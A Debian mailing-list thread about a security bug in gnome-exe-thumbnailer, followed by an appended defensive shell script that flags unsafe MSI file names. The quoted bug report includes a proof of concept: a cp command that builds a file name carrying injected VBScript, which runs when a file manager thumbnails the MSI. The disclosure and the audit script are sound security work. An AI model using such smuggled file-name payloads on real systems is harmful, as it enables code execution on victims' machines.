[pkg-wine-party] Bug#868705: Bug#868705: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript
Nils Dagsson Moskopp
nils at dieweltistgarnichtso.net
Tue Jul 18 01:02:04 UTC 2017

I like that the patch is less code. Deleted code is debugged code!
Btw, are you sure that using msiinfo does not introduce new bugs?
Cheers,
Nils
James Lu <bitflip3 at gmail.com> writes:
> Hi Nils,
>
> I wasn't able to reproduce the exploit on my (64-bit) system with either
> Caja or Nautilus (it also required setting up a new wineprefix in
> ~/.wine). The msi thumbnail ended up generating without any version
> information tag at all.
>
> Regardless, I've gone and replaced the VBScript-based parsing entirely
> with msitools' msiinfo in
> https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
> hopefully this should fix the issue. I'll tag a new release soon and
> look at pushing the fix to Debian.
>
> (Also CC'ing the other maintainers, who I don't think are on the Debian
> Wine list)
>
> Best,
> James
>
> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
>> Package: gnome-exe-thumbnailer
>> Version: 0.9.4-2
>> Severity: grave
>> Tags: security
>> Justification: user security hole
>> 
>> Dear Maintainer,
>> 
>> the following PoC is copied verbatim from my post about the parsing issue:
>> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>> 
>> Proof of Concept
>> 
>> Install Dependencies
>> 
>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
>> 
>> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
>> 
>> Create MSI Files
>> 
>> Create a file named poc.xml with the following content:
>> 
>> <?xml version="1.0" encoding="utf-8"?>
>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
>> <Product Version="1.0"/>
>> </Wix>
>> 
>> Execute the following Bourne Shell code:
>> 
>> wixl -o poc.msi poc.xml
>> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>> 
>> Trigger Execution
>> 
>> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
>> 
>> *** End of the template - remove these template lines ***
>> 
>> 
>> -- System Information:
>> Debian Release: 9.0
>>   APT prefers stable
>>   APT policy: (500, 'stable')
>> Architecture: i386 (i686)
>> 
>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
>> Shell: /bin/sh linked to /bin/dash
>> Init: sysvinit (via /sbin/init)
>> 
>> Versions of packages gnome-exe-thumbnailer depends on:
>> ii  icoutils                         0.31.2-1.1
>> ii  imagemagick                      8:6.9.7.4+dfsg-11
>> ii  imagemagick-6.q16 [imagemagick]  8:6.9.7.4+dfsg-11
>> ii  libglib2.0-bin                   2.50.3-2
>> 
>> Versions of packages gnome-exe-thumbnailer recommends:
>> pn  wine                                                                 <none>
>> pn  wine64-tools | wine32-tools | wine64-development-tools | wine32-dev  <none>
>> 
>> gnome-exe-thumbnailer suggests no packages.
>> 
>> -- no debconf information
>> 
>
-- 
Nils Dagsson Moskopp // erlehmann
<http://dieweltistgarnichtso.net>
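
Added example, not part of this thread and not gnome-exe-thumbnailer's code: a shell audit for the class of bug reported above, where a file name ends up inside script text instead of being handed over as data. It assumes the name would be placed in a double-quoted VBScript string literal; all function names and sample file names are made up for illustration.

```sh
#!/bin/sh
# Added example; function names and sample file names are made up.

nl='
'

# Succeeds when NAME can sit inside a double-quoted VBScript string literal
# unchanged: a double quote ends the literal, a line break ends the statement.
vbs_literal_safe() {
    case $1 in
        *'"'*|*"$nl"*) return 1 ;;
    esac
    return 0
}

# Escapes NAME for a VBScript literal by doubling each double quote.
# Shown for comparison only; names with line breaks must still be rejected.
vbs_escape() {
    printf '%s' "$1" | sed 's/"/""/g'
}

# Turns NAME into an operand a command-line tool cannot read as an option:
# relative names get a ./ prefix so a leading "-" is harmless.
as_operand() {
    case $1 in
        /*|./*) printf '%s' "$1" ;;
        *) printf './%s' "$1" ;;
    esac
}

# Prints how many non-hidden *.msi files directly inside DIR have names that
# would break out of a VBScript string literal; lists them on stderr.
audit_msi_names() {
    count=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        name=${f##*/}
        case $name in *.[mM][sS][iI]) ;; *) continue ;; esac
        if ! vbs_literal_safe "$name"; then
            count=$((count + 1))
            printf 'unsafe in a script template: %s\n' "$name" >&2
        fi
    done
    printf '%s\n' "$count"
}

if [ "$#" -gt 0 ]; then audit_msi_names "$1"; fi
```

Passing the result of `as_operand` as one quoted argument to a parser keeps the name out of any script text, which is why an argument-based tool removes this particular injection point.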